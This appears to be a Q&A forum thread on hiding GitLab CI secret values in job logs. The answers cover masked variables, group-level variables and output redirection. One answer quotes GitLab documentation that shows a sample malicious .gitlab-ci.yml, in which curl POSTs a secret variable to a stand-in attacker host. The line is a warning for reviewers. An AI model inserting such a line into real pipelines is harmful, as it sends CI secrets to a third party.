# Hide variable value in Gitlab pipeline logs when bash script is executed

Tags: bash, shell, gitlab, gitlab-ci

When I run a bash file in a stage (Gitlab pipeline), it displays the GitLab secrets values in the logs which ideally should not be visible. How can I avoid this?

GitLab pipeline stage

```
stage: docker_push
script:
    - /home/directory/dockerPush.sh
tags:
    - docker
```

bash file (dockerPush.sh) content

```
docker login --username foo --password ${DOCKER_LOGIN_PASSWORD}
docker push ${IMAGE_NAME}
```

Pipeline Logs

```
+ docker login --username foo --password Doc49byfe
```

Answer (score 3, accepted):

When you add a variable check the 'Mask variable' option:

[image]

Answer (score 1):

You need to use the mask feature like the Glen answer.

But the mask feature has some limitations related to format of your variable like this documentation https://docs.gitlab.com/ee/ci/variables/#masked-variable-requirements

If Gitlab refuses to mask your variable, you need to do it in your shell script.

A simple way is send the output to a file (if you really need the log) or the other option is to send the output to `/dev/null`

Answer (score 1):

There are [**Group-Level Environmental Variables**](https://docs.gitlab.com/ee/ci/variables/#group-level-environment-variables) available in GitLab:

> You can define per-project or per-group variables that are set in the pipeline environment. Group-level variables are stored out of the repository (not in .gitlab-ci.yml). They are securely passed to GitLab Runner, which makes them available during a pipeline run. ***//***
> We recommend using group environment variables to store secrets (like passwords, SSH keys, and credentials) **for Premium users** who:
>
> - Do not use an external key store.
> - Use GitLab’s integration with HashiCorp Vault.

Further:

> #### Security
>
> Malicious code pushed to your .gitlab-ci.yml file could compromise your variables and send them to a third party server regardless of the masked setting. If the pipeline runs on a protected branch or protected tag, it could also compromise protected variables.

> All merge requests that introduce changes to .gitlab-ci.yml should be reviewed carefully before:

> Running a pipeline in the parent project for a merge request submitted from a forked project.
>
> #### Merging the changes.
>
> Here is a simplified example of a malicious `.gitlab-ci.yml`:

```
build:
  script:
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" https://maliciouswebsite.abcd/
```

About *Masking*

> Mask variable (Optional): If selected, the variable’s Value is not shown in job logs. The variable is not saved if the value does not meet the masking requirements.

> Enabling debug tracing can have severe security implications. The output will contain the content of all your variables and any other secrets! The output will be uploaded to the GitLab server and made visible in job logs!

Conclusion:

1. Use group variables
2. If you can not: Mask variables

Answer (score -1):

Did you try to add your env variable from the gitlab admin pannel, and set your variable to **protected**? Here is an example: https://secrethub.io/docs/guides/gitlabci/#provide-credential
best,

Comment: protected dont mask the env var variable, just make it ready to use only in the protected branches

Comment: I meant the mask feature my bad, I work too much with bitbucket pipeline where the term "secured" is used :)